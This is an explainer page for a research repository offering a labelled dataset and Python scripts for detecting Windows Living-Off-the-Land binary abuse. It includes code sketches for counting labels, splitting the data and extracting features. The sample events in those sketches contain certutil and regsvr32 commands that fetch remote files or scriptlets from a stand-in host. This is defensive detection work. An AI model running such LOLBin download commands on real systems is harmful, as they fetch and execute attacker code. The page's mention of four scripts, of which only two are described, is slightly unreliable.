explaingit

daniyyell-dev/winlolbin-gt-dataset

Analysis updated 2026-05-18

Stars · 2 Language · Python Audience · researcher Complexity · 3/5 License · MIT (scripts), CC BY 4.0 (dataset) Setup · moderate

TLDR

A ten-million-row labelled dataset and Python scripts for training ML models to detect Windows Living-Off-the-Land binary abuse, split evenly between benign and malicious process events.

Mindmap

mindmap
  root((repo))
    What it does
      Labelled event dataset
      Benign vs malicious
      ML training data
    Dataset Contents
      10 million events
      55 behavior features
      MITRE ATT&CK labels
    Scripts
      generate dataset
      extract features
      build artifacts
    Data Sources
      LOLBAS catalog
      Atomic Red Team
      MITRE ATT&CK

What do people build with it?

USE CASE 1

Train a machine learning model to detect Windows LOLBIN abuse using the pre-built labelled dataset from Zenodo

USE CASE 2

Reproduce the full ten-million-row dataset from scratch using the generation scripts and verify the labelling methodology

USE CASE 3

Use the 55 extracted behavioral features as a starting point for a SIEM detection rule or anomaly model

USE CASE 4

Benchmark a new detection model on unseen LOLBin attack scenarios not present in the training data
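One way to approximate the "unseen scenarios" benchmark in use case 4 is to hold out whole binaries, so that no tool in the test set also appears in training. The sketch below assumes each event is a dict with a `binary` field; that field name and the sample events are hypothetical, not the dataset's actual schema, and the repository may define "unseen" differently.

```python
import random
from collections import defaultdict


def split_by_binary(events, test_fraction=0.25, seed=0):
    """Hold out whole binaries so test events come from tools unseen in training."""
    by_binary = defaultdict(list)
    for event in events:
        by_binary[event["binary"]].append(event)

    # Shuffle the binary names reproducibly, then reserve a fraction for testing.
    binaries = sorted(by_binary)
    random.Random(seed).shuffle(binaries)
    n_test = max(1, round(len(binaries) * test_fraction))
    test_binaries = set(binaries[:n_test])

    train = [e for b in binaries if b not in test_binaries for e in by_binary[b]]
    test = [e for b in sorted(test_binaries) for e in by_binary[b]]
    return train, test


# Hypothetical stand-in events; "binary" and "label" are assumed field names.
events = [
    {"binary": "certutil.exe", "label": "malicious"},
    {"binary": "certutil.exe", "label": "benign"},
    {"binary": "regsvr32.exe", "label": "malicious"},
    {"binary": "regsvr32.exe", "label": "benign"},
    {"binary": "mshta.exe", "label": "malicious"},
    {"binary": "mshta.exe", "label": "benign"},
    {"binary": "rundll32.exe", "label": "malicious"},
    {"binary": "rundll32.exe", "label": "benign"},
]
train_events, test_events = split_by_binary(events)
train_binaries = {e["binary"] for e in train_events}
held_out_binaries = {e["binary"] for e in test_events}
```

Splitting by group rather than by row avoids the case where near-identical command lines for the same tool land on both sides of the split and inflate the measured accuracy.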

What is it built with?

Python

How does it compare?

| | daniyyell-dev/winlolbin-gt-dataset | 0-bingwu-0/live-interpreter | 0xkaz/llm-governance-dashboard |
| Stars | 2 | 2 | 2 |
| Language | Python | Python | Python |
| Setup difficulty | moderate | moderate | hard |
| Complexity | 3/5 | 2/5 | 4/5 |
| Audience | researcher | general | ops devops |

Figures from each repo's GitHub metadata at analysis time.

How do you get it running?

Difficulty · moderate Time to first run · 30min

Dataset files are hosted on Zenodo, not in this repo. Generating the dataset from scratch also requires the LOLBAS catalog and the libLOL command library.

Scripts are MIT licensed. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when used.
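After downloading the dataset files, a quick sanity check is to confirm the benign/malicious split without loading ten million rows into memory. The sketch below streams rows and tallies one column. It assumes a CSV export with a `label` column; both the file format and the column names are assumptions, so adjust them to whatever the Zenodo files actually contain.

```python
import csv
import io
from collections import Counter


def count_labels(lines, label_column="label"):
    """Stream CSV rows and tally the values found in one column."""
    reader = csv.DictReader(lines)
    counts = Counter()
    for row in reader:
        counts[row[label_column]] += 1
    return counts


# Tiny in-memory stand-in for a downloaded file; column names are hypothetical.
sample = io.StringIO(
    "command_line,label\n"
    "certutil.exe -hashfile report.pdf SHA256,benign\n"
    "certutil.exe -urlcache -f http://example.test/a.bin a.bin,malicious\n"
    "ipconfig /all,benign\n"
    "regsvr32.exe /s /u /i:http://example.test/x.sct scrobj.dll,malicious\n"
)
label_counts = count_labels(sample)
print(label_counts)
```

For a real file, pass an open handle instead of the `StringIO` object, for example `open(path, newline="", encoding="utf-8")`, where `path` points at the downloaded file.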

In plain English

WinLOLBIN-GT is a labelled dataset created for training machine learning models to detect a specific type of attack on Windows computers. The attack technique is called Living Off the Land, which means an attacker uses built-in Windows tools that already come with the operating system to carry out malicious actions rather than installing separate malware. Because these are legitimate system tools, they are harder for traditional security software to flag.

The dataset contains ten million labelled events: five million that represent normal administrative use of these Windows tools, and five million that represent malicious use patterns drawn from known attack procedures. Each event looks like a realistic process execution record, including the command line used, the parent process, file paths, user context, and a MITRE ATT&CK technique identifier that labels the attack category. A model trained on this dataset was tested on attack scenarios it had never seen and achieved 99 percent accuracy.

The repository contains four Python scripts. The first generates the raw ten-million-row dataset by simulating events from the LOLBAS catalog, a public list of Windows binaries that attackers commonly abuse, and Red Canary's Atomic Red Team attack procedures. The second script processes the raw data, extracts 55 behavioral features per event, and removes fields that would leak ground-truth labels into model training.

The finished dataset is hosted separately on Zenodo and is not stored in this repository. The generation scripts are licensed under MIT. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when you use them.
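The feature-extraction and leak-removal step described above can be illustrated with a minimal sketch. The five features and the field names below (`command_line`, `parent_process`, `label`, `mitre_technique`, `scenario_id`) are hypothetical stand-ins chosen for illustration. They are not the dataset's actual 55 features or its real schema.

```python
import re

# Hypothetical names for fields that would reveal the label to a model.
LEAKY_FIELDS = {"label", "mitre_technique", "scenario_id"}

URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe"}


def extract_features(event):
    """Turn one process event into a small dict of numeric features."""
    cmd = event.get("command_line", "")
    tokens = cmd.split()
    parent = event.get("parent_process", "").lower()
    return {
        "cmd_length": len(cmd),
        "token_count": len(tokens),
        "has_url": int(bool(URL_PATTERN.search(cmd))),
        # Count arguments that look like switches, e.g. "-f" or "/s".
        "switch_count": sum(1 for t in tokens if t.startswith(("/", "-"))),
        "parent_is_office": int(parent in OFFICE_PARENTS),
    }


def strip_leaky_fields(event):
    """Drop fields that encode the ground truth before building model input."""
    return {k: v for k, v in event.items() if k not in LEAKY_FIELDS}


# Hypothetical example event.
event = {
    "command_line": "certutil.exe -urlcache -f http://example.test/a.bin a.bin",
    "parent_process": "WINWORD.EXE",
    "label": "malicious",
    "mitre_technique": "T1105",
}
features = extract_features(event)
model_input = strip_leaky_fields(event)
```

Keeping the label and the technique identifier out of the model input matters because a classifier that can read them would score well in training while learning nothing about the command line itself.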

Copy-paste prompts

Prompt 1
I want to train a binary classifier to detect Windows LOLBIN abuse using WinLOLBIN-GT. Walk me through downloading the dataset from Zenodo, what the 55 features represent, and a basic scikit-learn setup.
Prompt 2
How do I run generate_winlolbin_gt_dataset.py to produce the raw 10-million-row dataset, and what source files do I need before running it?
Prompt 3
What is the model_text field in WinLOLBIN-GT and how should I use it when fine-tuning a text-based classifier?
Prompt 4
I want to extend WinLOLBIN-GT with new LOLBin techniques. How do I add new malicious command patterns without introducing duplicates?

Frequently asked questions

What is winlolbin-gt-dataset?

A ten-million-row labelled dataset and Python scripts for training ML models to detect Windows Living-Off-the-Land binary abuse, split evenly between benign and malicious process events.

What language is winlolbin-gt-dataset written in?

Python.

What license does winlolbin-gt-dataset use?

Scripts are MIT licensed. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when used.

How hard is winlolbin-gt-dataset to set up?

Setup difficulty is rated moderate, with roughly 30 minutes to a first successful run.

Who is winlolbin-gt-dataset for?

Mainly researchers.

Verify against the repo before relying on details.